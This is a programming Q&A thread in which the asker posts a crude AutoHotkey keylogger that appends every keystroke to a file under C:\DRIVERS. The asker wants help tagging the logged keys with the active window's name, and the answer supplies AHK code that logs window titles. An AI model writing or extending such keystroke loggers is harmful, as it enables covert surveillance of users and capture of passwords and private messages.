# How to send current name of window to txt file

Tags: window

Ok so I need to know is their any way in any script to, when run, send the current name of the window to a text file.
Thanks 
(update)
I have an ahk keylogger:

~a::fileappend, a, C:\DRIVERS\debug.txt

~b::fileappend, b, C:\DRIVERS\debug.txt

~c::fileappend, c, C:\DRIVERS\debug.txt

~d::fileappend, d, C:\DRIVERS\debug.txt

~e::fileappend, e, C:\DRIVERS\debug.txt

ETC

so the result of this script is that when a key is pressed, eg "a" then if their is no existing debug.txt file then it makes a new one with the contents "a", any other keystrokes are simply added to the txt file. What I want to do is have the name of the window the user was in WHEN the key was pressed, placed BEFORE the keystrokes for example "chrome.exe ***keys pressed***

I hope that I have explained my question clearly 
Thanks

Comment: What kind of script? (Perl/Python/batch/ruby/other) What kind of window? (Linux/mac/ms? Native? Jframe?)

Comment: preferably ahk because that is what my keylogger script is written in

Answer (score 0):

Here's an approach using [AutoHotKey](https://autohotkey.com/):

Create a file called `script.ahk`:

```
WinGetTitle, title, A
;MsgBox, "%title%"
FileAppend, %title%`n, %A_WorkingDir%\titles.txt
```

Remove the semicolon from the second line to see what window titles are being saved.

Once you run the script, it will append the title of the active window to `./titles.txt`.